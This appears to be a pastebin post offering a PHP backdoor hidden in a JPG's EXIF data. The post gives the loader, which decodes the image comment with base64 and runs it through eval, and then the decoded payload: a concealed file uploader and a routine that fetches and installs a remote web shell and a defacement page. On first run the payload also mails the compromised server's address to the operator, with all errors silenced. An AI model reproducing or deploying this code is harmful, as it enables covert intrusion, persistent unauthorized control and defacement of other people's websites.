
hidden log by jpg

Oct 2nd, 2016
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PHP 2.51 KB | None | 0 0
  1. decoder : sohai
  2. contact me:
  3. desript : hidden uploader,shell, and auto deface.
  4.         ->how to use : test.php?0upload = hidden uploader
  5.         -            : test.php?0shell  = hidden shell
  6.                        test.php?0deface = auto deface.
  7. sample encode :
  8. <?php
  9. $BASED = exif_read_data("");
  10. eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
  12. ?>
  14. decode:
  15. <?php
  16. @ini_set('output_buffering',0);
  17. @ini_set('display_errors', 0);
  18. @error_reporting(0);
  19. $up = " <html> <head><title> -= Syedich =- </title></head><body><center><h1><font face=\"Tahoma\" size=\"5\" color=\"#ff0000\">Learn To Better</font></h1><form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\"><table border=\"1\"><tr><td bgcolor=\"#000000\"><font color=\"#00ff00\"><input type=\"file\" name=\"file\" size=\"50\"><td bgcolor=\"#000000\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload File\"></td></td></tr></table></form></center></body>";
  20. if( $_POST['_upl'] == "Upload File" ) {
  21. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
  22. echo '<b><center>
  23. <font face=\"Tahoma\" size=\"5\" color=\"#ff0000\">SUKSES UPLOAD MASTAH !!</center></b>';
  24. }
  25. else {
  26. echo '
  27. <font face=\"Tahoma\" size=\"5\" color=\"#ff0000\"><center><b>GAGAL UPLOAD MASTAH !</b>';
  28. }
  29. }
  30. if(isset($_GET["0upload"])){
  31. echo "$up";
  32. }
  33. /////////////////////////////
  34.  if(isset($_GET["0cek"])){
  35. echo "Password E :".$auth_pass;
  36.  }
  37. /////////////////////////////
  38. if (file_exists('.db'))
  39.  {  } else {
  40. $to = "";
  41. $subject = $_SERVER['SERVER_NAME'];
  42. $header = "From: Mastah <>";
  43. $message = "Exploit : http://". $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI'];
  44. mail($to, $subject, $message, $header);
  45. $m = fopen(".db", "w") or die (" ");
  46. $txt = "";
  47. fwrite($m, $txt);
  48. fclose($m);
  49. chmod(".db",0644); }
  50. /////////////////////////////
  51.  if(isset($_GET["0shell"])){
  52. $anak1 = file_get_contents("");
  53. $nggawe1 = fopen("themes.php","w") or die ("gabisa pak");
  54. fwrite($nggawe1,$anak1);
  55. fclose($nggawe1);
  56. header ("Location:themes.php");
  57. chmod("themes.php",0644);}
  58. //////////////////////////////
  59. if(isset($_GET["0deface"])){
  60. $anak = file_get_contents("");
  61. $nggawe = fopen("0x.htm","w") or die ("gabisa pak");
  62. fwrite($nggawe,$anak);
  63. fclose($nggawe);
  64. header ("Location:0x.htm");}
  65. ?>
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